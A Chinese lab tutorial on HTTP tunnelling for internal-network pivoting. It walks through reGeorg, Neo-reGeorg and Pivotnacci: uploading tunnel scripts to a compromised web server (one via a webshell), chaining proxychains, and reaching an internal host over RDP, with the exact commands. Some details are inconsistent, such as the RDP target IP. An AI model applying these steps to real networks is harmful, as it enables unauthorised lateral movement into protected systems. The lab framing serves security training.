内网隧道——HTTP隧道

文章目录

实验网络拓扑如下:

攻击机kali IP:192.168.111.0
跳板机win7 IP:192.168.111.128,192.168.52.143
靶机win server 2008 IP:192.168.52.138

攻击机与Web服务器彼此之间都可以进行直接通信,但是攻击机与靶机之间不能直接进行通信,目的:通过建立HHTP隧道转发的方式将攻击机连接上内部的靶机

一、ReGeorg

1、Web服务器是PHP环境,可以使用tunnel.nosocket.php脚本文件,上传文件到Web服务器网站根目录下。成功上传则通过http访问网站此脚本文件,可以看到部署成功,如图下图所示。

2、使用攻击机运行reGeorgSocksProxy.py文件, 执行下面的命令,连接tunnel.nosocket.php文件,攻击机的8888端口与受害机的80端口建立HTTP隧道,出现如下界面则证明隧道穿透成功。

bash 复制代码
python2 reGeorgSocksProxy.py -u http://192.168.111.128/tunnel.nosocket.php -p 8888

3、在kali中修改proxychains4.conf配置文件,并在其底部添加一行socks5 127.0.0.1 8888参数来完成 proxychains 代理配置,如下图所示。

bash 复制代码
vim /etc/proxychains4.conf

4、当配置完proxychains代理后,即可在攻击机执行下面命令来连接靶机,通过所建立的 socks协议隧道,直接远程连接到目标服务器。

bash 复制代码
proxychains rdesktop 192.168.111.128

二、Neo-reGeorg

Neo-regeorg可以说是Regeorg的重构版,也是一款很实用的WEB隧道工具,在Regeorg的基础上提高隧道的连接安全性、可用性、传输内容保密性,以应对更多的网络环境场景,工具依赖python3环境,它的原理与regeorg相似。

1、使用如下命令生成带有密码的服务器脚本文件。

bash 复制代码
python3 neoreg.py  generate -k test

2、通过webshell将tunnel.php文件上传Web服务器网站服务的根目录下。

3、Kali攻击机执行以下命令,此时隧道搭建成功。

bash 复制代码
python3 neoreg.py -k test -u http://192.168.111.128/tunnel.php -p 8888

4、在kali中修改proxychains4.conf配置文件,并在其底部添加一行socks5127.0.0.1 8888参数来完成 proxychains 代理配置,如下图所示。

bash 复制代码
vim /etc/proxychains4.conf

5、当配置完proxychains代理后,即可在攻击机执行下面命令来连接靶机,通过所建立的 socks协议隧道,直接远程连接到目标服务器。

bash 复制代码
proxychains rdesktop 192.168.111.128

三、Pivotnacci

1、下载完安装包解压后需要先初始化。

bash 复制代码
pip3 install -r requirements.txt 
python3 setup.py install

2、如果需要使用密码加密,可以在agents/agent.php文件中为AGENT_PASSWORD赋值,这里将密码设置为test

3、设置完成后将agent.php放置在网站根目录下,在攻击机执行

bash 复制代码
pivotnacci http://192.168.111.128/agent.php -p 6666 --password test -v

其中-p 6666是指定转发端口,--password是指自定义密码,执行成功则如图下图所示。

4、在kali中修改proxychains4.conf配置文件,并在其底部添加一行socks5 127.0.0.1 6666参数来完成 proxychains 代理配置,如下图所示。

bash 复制代码
vim /etc/proxychains4.conf

5、当配置完proxychains代理后,即可在攻击机执行下面命令来连接靶机,通过所建立的 socks协议隧道,直接远程连接到目标服务器。

bash 复制代码
proxychains rdesktop 192.168.111.128
相关推荐
亚空间仓鼠16 分钟前
OpenEuler系统常用服务(五)
linux·运维·服务器·网络
聊点儿技术21 分钟前
CDN调度失准导致跨省流量浪费?在GSLB层用IP归属地查询实现精准就近接入
网络·ip·ip归属地查询·ip地址查询·ip离线库·cdn调度
咸鱼嵌入式36 分钟前
【AutoSAR】详解PDUR模块
网络
戮戮1 小时前
Spring Cloud Gateway 零拷贝参数校验:一种高性能网关架构实践
java·网络·架构·gateway
[ ]8981 小时前
Stack_MLAG_知识点梳理
网络·笔记·网络协议
上海云盾-小余1 小时前
精准抵御流量攻击:高防 IP + 游戏盾组合部署实战详解
网络·tcp/ip·游戏
盟接之桥2 小时前
盟接之桥®制造业EDI软件,打通全球供应链“最后一公里”,赋能中国制造连接世界
网络·安全·低代码·重构·汽车·制造
江畔何人初2 小时前
TCP的三次握手与四次挥手
linux·服务器·网络·网络协议·tcp/ip
m0_738120722 小时前
网络安全编程——Python编写基于UDP的主机发现工具(解码IP header)
python·网络协议·tcp/ip·安全·web安全·udp
北京耐用通信2 小时前
不换设备、不重写程序:耐达讯自动化网关如何实现CC-Link IE转Modbus TCP的高效互通?
人工智能·科技·物联网·网络协议·自动化·信息与通信